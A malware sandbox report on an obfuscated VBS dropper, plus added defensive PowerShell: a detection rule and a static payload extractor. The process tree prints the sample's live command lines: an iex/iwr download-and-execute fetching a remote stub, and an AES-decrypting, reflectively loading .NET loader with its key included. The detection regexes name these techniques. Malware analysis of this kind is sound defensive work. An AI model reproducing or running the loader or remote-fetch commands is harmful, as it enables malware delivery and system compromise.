Analysis
- max time kernel: 118s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 09/12/2024, 17:28 (DD/MM/YYYY)
Static task
- static1
Behavioral tasks
- behavioral1: 9273_output.vbs on win7-20241010-en
- behavioral2: 9273_output.vbs on win10v2004-20241007-en
- behavioral3: 9273_output.vbs on win10ltsc2021-20241023-en
- behavioral4: 9273_output.vbs on win11-20241007-en
General
- Target: 9273_output.vbs
- Size: 1.6MB
- MD5: 89444730511dcc04894433ad215e9f02
- SHA1: 8af2c8469f0381666bbdfbb12965c48290ef817b
- SHA256: 7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625
- SHA512: 121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f
- SSDEEP: 24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run PowerShell and hide display window.
  pid   Process
  1824  powershell.exe
  1256  powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1256  powershell.exe
  1824  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   1256  powershell.exe
  Token: SeDebugPrivilege   1824  powershell.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process       procid_target
  PID 1980 wrote to memory of 1932   1980  WScript.exe   30   (3 IoCs)
  PID 1932 wrote to memory of 1256   1932  cmd.exe       32   (3 IoCs)
  PID 1980 wrote to memory of 2756   1980  WScript.exe   34   (3 IoCs)
  PID 2756 wrote to memory of 1824   2756  cmd.exe       36   (3 IoCs)
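The signatures above are tria.ge's own. As an added triage example (not part of the report or the sample), the rule below scores process-creation records for the pattern this report records: powershell.exe launched under a script host via cmd.exe with -ExecutionPolicy Bypass, a hidden window, an iex/iwr download-and-execute, or the reversed-string and Reflection.Assembly tricks. The records are constructed in a Sysmon Event ID 1 / 4688-like shape; the two malicious command lines are copied (the second abridged) from the report's process tree, the benign one is made up. Indicator names and the score threshold are this example's choices.

```powershell
# Added triage example, not part of the tria.ge report or the sample.
# Scores powershell.exe launches for the indicators visible in this report.

$Indicators = [ordered]@{
    'exec-policy-bypass' = '-(ep|ex|exec|executionpolicy)\s+bypass'   # -ExecutionPolicy Bypass / -ep bypass
    'hidden-window'      = '-(w|win|windowstyle)\s+hidden'            # -windowstyle hidden
    'download-and-exec'  = '\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b'
    'reversed-string'    = '\[-1\.\.-\d+\]\s*-join'                   # 'gnirtS46esaBmorF'[-1..-16] -join ''
    'reflective-load'    = 'Reflection\.Assembly\]::'                 # [System.Reflection.Assembly]::Load (or ::('daoL'...))
    'aes-in-cmdline'     = 'Cryptography\.Aes\]::Create'              # payload decrypted in memory
}
# Script hosts that should rarely be the parent or grandparent of powershell.exe
$ScriptHostParents = @('wscript.exe', 'cscript.exe', 'mshta.exe')

function Test-PowerShellLaunch {
    param([Parameter(Mandatory)][pscustomobject]$Event)

    if ([System.IO.Path]::GetFileName($Event.Image).ToLower() -ne 'powershell.exe') { return $null }

    $hits = New-Object System.Collections.Generic.List[string]
    foreach ($name in $Indicators.Keys) {
        # -match is case-insensitive by default, which suits PowerShell switches
        if ($Event.CommandLine -match $Indicators[$name]) { $hits.Add($name) }
    }

    # Ancestry: the report shows cmd.exe between WScript.exe and powershell.exe,
    # so look one generation above the direct parent as well.
    $lineage = @($Event.ParentImage, $Event.GrandParentImage) |
        Where-Object { $_ } |
        ForEach-Object { [System.IO.Path]::GetFileName($_).ToLower() }
    if (@($lineage | Where-Object { $ScriptHostParents -contains $_ }).Count -gt 0) {
        $hits.Add('script-host-ancestor')
    }

    $verdict = if ($hits.Count -ge 2) { 'SUSPICIOUS' } else { 'ok' }   # threshold is this example's choice
    [pscustomobject]@{
        ProcessId  = $Event.ProcessId
        Score      = $hits.Count
        Verdict    = $verdict
        Indicators = ($hits -join ',')
    }
}

# --- CONSTRUCTED records (Sysmon EID 1 / 4688-like shape) ---
$Events = @(
    [pscustomobject]@{
        ProcessId = 1256; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'; GrandParentImage = 'C:\Windows\System32\WScript.exe'
        # stage-1 command line from the report
        CommandLine = 'powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ ''Authorization'' = ''your_fixed_token_here'' })"'
    },
    [pscustomobject]@{
        ProcessId = 1824; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'; GrandParentImage = 'C:\Windows\System32\WScript.exe'
        # stage-2 command line from the report, abridged to the fragments that carry the indicators
        CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); ' +
                      '$a.Key=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g=''); ... } ' +
                      'function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::(''daoL''[-1..-4] -join '''')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);} ...'
    },
    [pscustomobject]@{
        ProcessId = 4120; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\explorer.exe'; GrandParentImage = 'C:\Windows\System32\userinit.exe'
        # made-up benign launch
        CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\Scripts\nightly-backup.ps1'
    }
)

$Events | ForEach-Object { Test-PowerShellLaunch $_ } | Format-Table -AutoSize
```

Both command lines from the report trip several indicators plus the script-host ancestor check and come out SUSPICIOUS; the benign record trips none. In a real deployment the grandparent comes from joining on the parent's own creation event, and the regexes should be tuned against the estate's legitimate -ExecutionPolicy Bypass usage before alerting on a single indicator.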
Processes
[1] C:\Windows\System32\WScript.exe (PID 1980)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe (PID 1932)
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1256)
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 2756)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1824)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
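The second PowerShell command line (PID 1824) is a self-contained loader: it reads c.bat, takes the first line that begins with ":: " (a comment to cmd.exe), splits it on a backslash into two base64 blobs, base64-decodes each, AES-256-CBC decrypts them with the key and IV hardcoded in the command line, gunzips the result and hands the bytes to Assembly.Load, invoking the entry point of each. The reversed string literals resolve to FromBase64String ('gnirtS46esaBmorF'[-1..-16] -join ''), Load ('daoL'[-1..-4]) and ReadAllText ('txeTllAdaeR'[-1..-11]), which keeps those method names out of the visible command line. The script below is an added example, not part of the report or the sample: it performs the same decode chain statically and writes the payloads to disk instead of loading them, so the embedded assemblies can be hashed and analysed without executing them. The key and IV are the ones from the sample's command line; the c.bat it builds is a constructed fixture with stand-in payloads, since the real c.bat contents are not in the report. Protect-Blob exists only to build that fixture.

```powershell
# Added example, not part of the tria.ge report or the sample: static extractor for
# the c.bat loader format (base64 -> AES-256-CBC/PKCS7 -> gzip). Writes payloads to
# disk; never calls Assembly.Load.

$Key = [Convert]::FromBase64String('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g=')   # 32 bytes -> AES-256, from the sample
$IV  = [Convert]::FromBase64String('QFHft5W2NiDlaGOW8LKzjw==')                       # 16 bytes, from the sample

function New-AesCbc {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    return $aes
}

function Unprotect-Blob([string]$B64) {
    # Reverse of the loader's fn1 + fn2: base64 -> AES decrypt -> gunzip
    $aes = New-AesCbc
    $dec = $aes.CreateDecryptor()
    $cipher = [Convert]::FromBase64String($B64)
    $plain  = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)   # throws on wrong key/IV (bad PKCS7 padding)
    $dec.Dispose(); $aes.Dispose()
    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out)
    $gz.Dispose(); $in.Dispose()
    $bytes = $out.ToArray()
    $out.Dispose()
    return $bytes
}

function Protect-Blob([byte[]]$Data) {
    # Forward direction (gzip -> AES encrypt -> base64); used only to build the constructed fixture
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($out, [IO.Compression.CompressionMode]::Compress, $true)
    $gz.Write($Data, 0, $Data.Length)
    $gz.Dispose()                       # flushes the gzip footer into $out
    $packed = $out.ToArray()
    $out.Dispose()
    $aes = New-AesCbc
    $enc = $aes.CreateEncryptor()
    $cipher = $enc.TransformFinalBlock($packed, 0, $packed.Length)
    $enc.Dispose(); $aes.Dispose()
    return [Convert]::ToBase64String($cipher)
}

function Get-EmbeddedPayloads([string]$BatPath) {
    # Mirrors the loader's search: first line starting with ':: ' carries the blobs, split on '\'
    $lines   = [System.IO.File]::ReadAllLines($BatPath)
    $carrier = $lines | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $carrier) { throw "No ':: ' carrier line in $BatPath" }
    $parts = $carrier.Substring(3).Split('\')
    $i = 0
    foreach ($p in $parts) {
        [byte[]]$bytes = Unprotect-Blob $p
        $outFile = Join-Path $env:TEMP ("payload{0}.bin" -f $i)
        [System.IO.File]::WriteAllBytes($outFile, $bytes)
        $isPE = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)   # 'MZ' header check
        [pscustomobject]@{ Index = $i; Bytes = $bytes.Length; LooksLikePE = $isPE; Path = $outFile }
        $i++
    }
}

# --- CONSTRUCTED fixture: stand-in payloads, not the real assemblies ---
$fake1 = [System.Text.Encoding]::ASCII.GetBytes('MZ stand-in payload 1')
$fake2 = [System.Text.Encoding]::ASCII.GetBytes('stand-in payload 2')
$bat   = Join-Path $env:TEMP 'c_constructed.bat'
@(
    '@echo off',
    ':: ' + (Protect-Blob $fake1) + '\' + (Protect-Blob $fake2),
    'exit /b'
) | Set-Content -Path $bat -Encoding ASCII

Get-EmbeddedPayloads $bat | Format-Table -AutoSize
```

Point Get-EmbeddedPayloads at a recovered c.bat to dump the two assemblies for hashing and .NET decompilation. Only this stage is recoverable from the file itself: the first stage fetches https://emptyservices.xyz/stub.txt with a fixed Authorization header, and the report does not include the server's response.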
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1.6MB
  MD5: 63a0d558702bb4b4fdad3fbe2ffc0ac9
  SHA1: c70f2444e8052e6495c42f179785da267acac50b
  SHA256: c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757
  SHA512: 7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 3e1eefd04a30f99176dda02c61cad12a
  SHA1: 4af7b314f64569d47aef48924b6f4d6cb332a656
  SHA256: d9a0df80551338b49dfb5d0ec16db0dcaac68f80e81f5db17777ae643a4eb3e8
  SHA512: 2eea974192ed27f918db033ab704233ec094f2d94b6633a1663aecfad0045d752145194280bd318fa2cfda157eacbc272eea3e41b85feaef57066abd40a27f61
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UP5INLH8OZG4ZOAPQMTI.temp
  Filesize: 7KB
  MD5: 673fdbcaebd183256af7a23aa2752664
  SHA1: dca10dd769cc88081b40113352782c2348644ea3
  SHA256: 1c53589477bbff7de9d1d27159aa2261a20474938b34f9fd9f33a03f8c974fed
  SHA512: 3b6f737135994918ad8711d0fd0f0e95c8d5c4de6dfa3e6a4e56b51f9bb502d43db6e983b5eeeb8351c68540a3381fc8b6c5f2cd416e6b014183aebeb27fb08e